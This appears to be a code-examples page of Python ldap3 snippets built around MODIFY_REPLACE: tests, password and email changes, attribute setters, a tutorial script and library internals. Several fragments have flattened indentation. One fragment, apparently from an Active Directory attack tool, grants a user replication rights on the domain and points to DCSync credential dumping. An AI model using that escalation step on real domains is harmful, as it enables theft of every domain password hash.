Secure your code as it's written. Use Snyk Code to scan source code in minutes - no build needed - and fix issues immediately.
def test_modify_replace(self):
    """Replace ``givenName`` and ``sn`` on a fixture entry and expect 'success'.

    The target DN is taken from ``self.delete_at_teardown[0][0]``. The
    operation result is read from ``connection.result`` when the strategy
    is synchronous, and fetched through ``get_response()`` otherwise.
    """
    conn = self.connection
    target_dn = self.delete_at_teardown[0][0]
    changes = {
        'givenName': (MODIFY_REPLACE, ['givenname-1-replaced']),
        'sn': (MODIFY_REPLACE, ['sn-replaced']),
    }
    outcome = conn.modify(target_dn, changes)
    if conn.strategy.sync:
        outcome = conn.result
    else:
        # modify() returned a handle that get_response() resolves to the result
        _, outcome = conn.get_response(outcome)
    self.assertEqual(outcome['description'], 'success')
def test_modify_replace_existing_singlevalue_3(self):
    """Replace ``sn`` on ``cn=user4`` via ``connection_3`` and check the stored value.

    After a successful replace, the entry held by the connection strategy
    must contain exactly one ``sn`` value, equal to ``b'user_test_sn'``.
    """
    dn = 'cn=user4,ou=test,o=lab'
    conn = self.connection_3
    conn.bind()
    outcome = conn.modify(dn, {'sn': (MODIFY_REPLACE, ['user_test_sn'])})
    if conn.strategy.sync:
        outcome = conn.result
    else:
        # modify() returned a handle that get_response() resolves to the result
        _, outcome = conn.get_response(outcome)
    self.assertEqual(outcome['description'], 'success')

    # Look the entry up only after the operation has been confirmed successful.
    stored_sn = conn.strategy.entries[dn]['sn']
    self.assertTrue(b'user_test_sn' in stored_sn)
    self.assertEqual(len(stored_sn), 1)
# NOTE(review): fragment of a password-change routine. The enclosing ``def``
# (which presumably supplies connection, user_dn, new_password, old_password
# and controls) and whatever follows the final log call are not visible here.
if str is bytes: # python2, converts to unicode
new_password = to_unicode(new_password)
if old_password:
old_password = to_unicode(old_password)
# The password is wrapped in double quotes and encoded as UTF-16-LE before
# being written to the unicodePwd attribute.
encoded_new_password = ('"%s"' % new_password).encode('utf-16-le')
if old_password: # normal users must specify old and new password
encoded_old_password = ('"%s"' % old_password).encode('utf-16-le')
# Self-service change: delete the old value and add the new one in a single modify.
result = connection.modify(user_dn,
{'unicodePwd': [(MODIFY_DELETE, [encoded_old_password]),
(MODIFY_ADD, [encoded_new_password])]},
controls)
else: # admin users can reset password without sending the old one
result = connection.modify(user_dn,
{'unicodePwd': [(MODIFY_REPLACE, [encoded_new_password])]},
controls)
# When the strategy is not synchronous, the value returned by modify() is
# handed to get_response() to obtain the result; otherwise the result is read
# directly from connection.result.
if not connection.strategy.sync:
_, result = connection.get_response(result)
else:
result = connection.result
# change successful, returns True
if result['result'] == RESULT_SUCCESS:
return True
# change was not successful, raises exception if raise_exception = True in connection or returns the operation result, error code is in result['result']
if connection.raise_exceptions:
# Imported locally; NOTE(review): the raise/return that presumably follows
# the log call is outside the visible lines.
from ...core.exceptions import LDAPOperationResult
if log_enabled(PROTOCOL):
log(PROTOCOL, 'operation result <%s> for <%s>', result, connection)
def change_email(username, password, email):
    """Change a user's email.

    Uses ldap3.MODIFY_DELETE if ``email`` is None.
    Uses ldap3.MODIFY_REPLACE in any other case; replace also adds the
    attribute if it is not yet set (it removes all existing values of the
    attribute and puts the new one in place).

    :param username: login used to open the LDAP connection
    :param password: password used to open the LDAP connection
    :param email: new mail address, or None to delete the attribute
    :raises UserNotFound: if the modify fails with LDAPNoSuchObjectResult
    :raises PasswordInvalid: re-raised unchanged after being logged
    :raises LDAPConnectionError: if the bound user lacks the access rights
        to modify the ``mail`` attribute
    """
    if email is None:
        mail_change = (ldap3.MODIFY_DELETE, [])
    else:
        mail_change = (ldap3.MODIFY_REPLACE, [email])

    try:
        with LdapConnector(username, password) as connector:
            connector.modify(dn=connector.get_dn(),
                             changes={'mail': [mail_change]})
    except ldap3.core.exceptions.LDAPNoSuchObjectResult as e:
        logger.error('LDAP user not found when attempting '
                     'change of mail address',
                     extra={'data': {'exception_args': e.args},
                            'stack': True})
        raise UserNotFound from e
    except PasswordInvalid:
        logger.info('Wrong password provided when attempting '
                    'change of mail address')
        raise
    except ldap3.core.exceptions.LDAPInsufficientAccessRightsResult as e:
        logger.error('Not sufficient rights to change the mail address')
        # Chain the LDAP error explicitly, as the UserNotFound path does, so
        # the traceback reports it as the direct cause.
        raise LDAPConnectionError from e
# NOTE(review): fragment of a generator-style handler (it uses ``yield``); the
# enclosing ``def`` and the code that creates ``c`` and the ``input_ldap_*``
# values are not visible here.
# NOTE(review): ``err`` is presumably bound by an enclosing ``except ... as err``
# that is outside the visible lines — confirm.
raise ValueError("Cannot connect to LDAP Server. Ensure credentials are correct\n Error: {0}".format(err))
# Inform user
msg = ""
if helper.LDAP_IS_ACTIVE_DIRECTORY:
msg = "Connected to {0}".format("Active Directory")
else:
msg = "Connected to {0}".format("LDAP Server")
yield StatusMessage(msg)
# Defaults to False so the results below report failure unless modify() sets it.
res = False
try:
yield StatusMessage("Attempting to update {0}".format(input_ldap_attribute_name))
# perform the Modify operation
res = c.modify(input_ldap_dn, {input_ldap_attribute_name: [(MODIFY_REPLACE, input_ldap_attribute_values)]})
# Any exception raised in the try body is replaced by a generic ValueError.
# NOTE(review): the message does not include the original error detail.
except Exception:
raise ValueError("Failed to update. Ensure 'ldap_dn' is valid and the update meets your LDAP CONSTRAINTS")
finally:
# Unbind connection
c.unbind()
# Summary of the operation: the modify() return value plus the inputs used.
results = {
"success": res,
"attribute_name": input_ldap_attribute_name,
"attribute_values": input_ldap_attribute_values,
"user_dn": input_ldap_dn
}
log.info("Completed")
def set_attribute(self, dn, attribute, value):
    """Replace all values of ``attribute`` on the entry ``dn``.

    ``value`` is normalised to a list before being sent as a MODIFY_REPLACE:

    * list/tuple: every element is converted to text; bool elements become
      ``"TRUE"``/``"FALSE"`` (the same spelling used for a scalar bool),
      everything else goes through ``str()``.
    * bool: sent as ``["TRUE"]`` or ``["FALSE"]``.
    * anything else: wrapped unchanged in a one-element list.

    :param dn: distinguished name of the entry to modify
    :param attribute: name of the attribute to replace
    :param value: new value or sequence of values
    """
    def _as_ldap_text(item):
        # bool needs explicit handling: str(True) is "True", which differs
        # from the "TRUE"/"FALSE" spelling emitted for a scalar bool.
        if isinstance(item, bool):
            return "TRUE" if item else "FALSE"
        return str(item)

    if isinstance(value, (list, tuple)):
        values = [_as_ldap_text(item) for item in value]
    elif isinstance(value, bool):
        values = [_as_ldap_text(value)]
    else:
        values = [value]
    self.conn.modify(dn, {attribute: [(ldap3.MODIFY_REPLACE, values)]})
# NOTE(review): fragment of a method (it uses ``self`` and ``return``); the
# enclosing ``def`` and the definitions of domainDumper, controls, usersid,
# username, restoredata and config are not visible here.
LOG.info('Querying domain security descriptor')
# Read the domain object's nTSecurityDescriptor and parse the raw bytes.
self.client.search(domainDumper.root, '(&(objectCategory=domain))', attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
entry = self.client.entries[0]
secDescData = entry['nTSecurityDescriptor'].raw_values[0]
secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)
# Save old SD for restore purposes
restoredata['old_sd'] = binascii.hexlify(secDescData).decode('utf-8')
restoredata['target_sid'] = usersid
# Append two object ACEs for usersid to the DACL.
# NOTE(review): the GUIDs are presumably the directory-replication extended
# rights referred to in the success message below — verify.
secDesc['Dacl']['Data'].append(create_object_ace('1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', usersid))
secDesc['Dacl']['Data'].append(create_object_ace('1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', usersid))
dn = entry.entry_dn
data = secDesc.getData()
# Write the modified descriptor back, replacing the existing value.
self.client.modify(dn, {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [data])}, controls=controls)
# A result code of 0 is treated as success.
if self.client.result['result'] == 0:
alreadyEscalated = True
LOG.critical(
'Success! User %s now has Replication-Get-Changes-All privileges on the domain' % username)
LOG.info('Try using DCSync with secretsdump.py and this user :)')
config.set_priv(True)
# Re-read the descriptor after the write so the stored value can be recorded.
self.client.search(domainDumper.root, '(&(objectCategory=domain))', attributes=[
'SAMAccountName', 'nTSecurityDescriptor'], controls=controls)
entry = self.client.entries[0]
newSD = entry['nTSecurityDescriptor'].raw_values[0]
# Save this to restore the SD later on
restoredata['target_dn'] = dn
restoredata['new_sd'] = binascii.hexlify(newSD).decode('utf-8')
restoredata['success'] = True
self.writeRestoreData(restoredata, dn)
return True
# NOTE(review): fragment of a generator-style handler (it uses ``yield``); the
# enclosing ``def`` and the code that creates ``c`` and the ``input_ldap_*``
# values are not visible here.
# Inform user
msg = ""
if helper.LDAP_IS_ACTIVE_DIRECTORY:
msg = "Connected to {0}".format("Active Directory")
else:
msg = "Connected to {0}".format("LDAP Server")
yield StatusMessage(msg)
# Defaults to False so the results below report failure unless a call sets it.
res = False
try:
yield StatusMessage("Attempting to change password")
# Active Directory goes through the Microsoft extended operation helper;
# other servers get a MODIFY_REPLACE on the userPassword attribute.
if helper.LDAP_IS_ACTIVE_DIRECTORY:
res = c.extend.microsoft.modify_password(str(input_ldap_dn), input_ldap_new_password)
else:
res = c.modify(input_ldap_dn, {'userPassword': [(MODIFY_REPLACE, [input_ldap_new_password])]})
# Any exception raised in the try body is replaced by a generic ValueError.
# NOTE(review): the message does not include the original error detail.
except Exception:
raise ValueError("Could not change password. Check input_ldap_dn and input_ldap_new_password are valid")
finally:
# Unbind connection
c.unbind()
# Summary of the operation: the call's return value plus the target DN.
results = {
"success": res,
"user_dn": input_ldap_dn
}
log.info("Completed")
# Produce a FunctionResult with the results
# NOTE(review): flat script fragment; ``conn`` is created outside the visible
# lines. Each operation is followed by a numbered print of conn.last_error.
# The statements depend on the directory state left by the previous ones, so
# their order matters.
print(conn.result)
# Create the tutorial container and a first person entry.
conn.add('ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', 'organizationalUnit')
print(1, conn.last_error)
conn.add('cn=b.young,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', 'inetOrgPerson', {'givenName': 'Beatrix', 'sn': 'Young', 'departmentNumber': 'DEV', 'telephoneNumber': 1111})
print(2, conn.last_error)
# Rename the entry from cn=b.young to cn=b.smith.
conn.modify_dn('cn=b.young,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', 'cn=b.smith')
print(3, conn.last_error)
# Create a second container and move the entry into it via new_superior.
conn.add('ou=moved, ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', 'organizationalUnit')
print(4, conn.last_error)
conn.modify_dn('cn=b.smith,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', 'cn=b.smith', new_superior='ou=moved, ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org')
print(5, conn.last_error)
# Add, delete and replace values of sn on the moved entry.
conn.modify('cn=b.smith,ou=moved,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', {'sn': [(MODIFY_ADD, ['Smyth'])]})
print(6, conn.last_error)
# The print labels jump from 6 to 8; there is no step labelled 7.
conn.modify('cn=b.smith,ou=moved,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', {'sn': [(MODIFY_DELETE, ['Young'])]})
print(8, conn.last_error)
conn.modify('cn=b.smith,ou=moved,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', {'sn': [(MODIFY_REPLACE, ['Smith'])]})
print(9, conn.last_error)
# Several changes on two attributes sent in a single modify call.
conn.modify('cn=b.smith,ou=moved,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', {'sn': [(MODIFY_ADD, ['Young', 'Johnson']), (MODIFY_DELETE, ['Smith'])], 'givenname': [(MODIFY_REPLACE, ['Mary', 'Jane'])]})
print(10, conn.last_error)
# Move the entry back to the tutorial container, adjust it, and rename it to cn=b.young.
conn.modify_dn('cn=b.smith,ou=moved,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', 'cn=b.smith', new_superior='ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org')
print(11, conn.last_error)
conn.modify('cn=b.smith,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', {'sn': [(MODIFY_DELETE, ['Johnson'])], 'givenname': [(MODIFY_REPLACE, ['Beatrix'])]})
print(12, conn.last_error)
conn.modify_dn('cn=b.smith,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', 'cn=b.young')
print(13, conn.last_error)
# Add two more person entries to the tutorial container.
conn.add('cn=m.johnson,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', 'inetOrgPerson', {'givenName': 'Mary Ann', 'sn': 'Johnson', 'departmentNumber': 'DEV', 'telephoneNumber': 2222})
print(14, conn.last_error)
conn.add('cn=q.gray,ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org', 'inetOrgPerson', {'givenName': 'Quentin', 'sn': 'Gray', 'departmentNumber': 'QA', 'telephoneNumber': 3333})
print(15, conn.last_error)
# Build an object definition for inetOrgPerson and a Reader over the tutorial container.
obj_person = ObjectDef('inetOrgPerson', conn)
r = Reader(conn, obj_person, 'ou=ldap3-tutorial,dc=demo1,dc=freeipa,dc=org')
attribute_name_to_check = attribute_name
if self.server.schema.attribute_types and attribute_name_to_check.lower() not in conf_attributes_excluded_from_check and attribute_name_to_check not in self.server.schema.attribute_types:
raise LDAPAttributeError('invalid attribute type ' + attribute_name_to_check)
change = changes[attribute_name]
if isinstance(change, SEQUENCE_TYPES) and change[0] in [MODIFY_ADD, MODIFY_DELETE, MODIFY_REPLACE, MODIFY_INCREMENT, 0, 1, 2, 3]:
if len(change) != 2:
self.last_error = 'malformed change'
if log_enabled(ERROR):
log(ERROR, '%s for <%s>', self.last_error, self)
raise LDAPChangeError(self.last_error)
changelist[attribute_name] = [change] # insert change in a list
else:
for change_operation in change:
if len(change_operation) != 2 or change_operation[0] not in [MODIFY_ADD, MODIFY_DELETE, MODIFY_REPLACE, MODIFY_INCREMENT, 0, 1, 2, 3]:
self.last_error = 'invalid change list'
if log_enabled(ERROR):
log(ERROR, '%s for <%s>', self.last_error, self)
raise LDAPChangeError(self.last_error)
changelist[attribute_name] = change
request = modify_operation(dn, changelist, self.auto_encode, self.server.schema if self.server else None, validator=self.server.custom_validator if self.server else None, check_names=self.check_names)
if log_enabled(PROTOCOL):
log(PROTOCOL, 'MODIFY request <%s> sent via <%s>', modify_request_to_dict(request), self)
response = self.post_send_single_response(self.send('modifyRequest', request, controls))
self._entries = []
if isinstance(response, STRING_TYPES + (int, )):
return_value = response
if log_enabled(PROTOCOL):
log(PROTOCOL, 'async MODIFY response id <%s> received via <%s>', return_value, self)
else: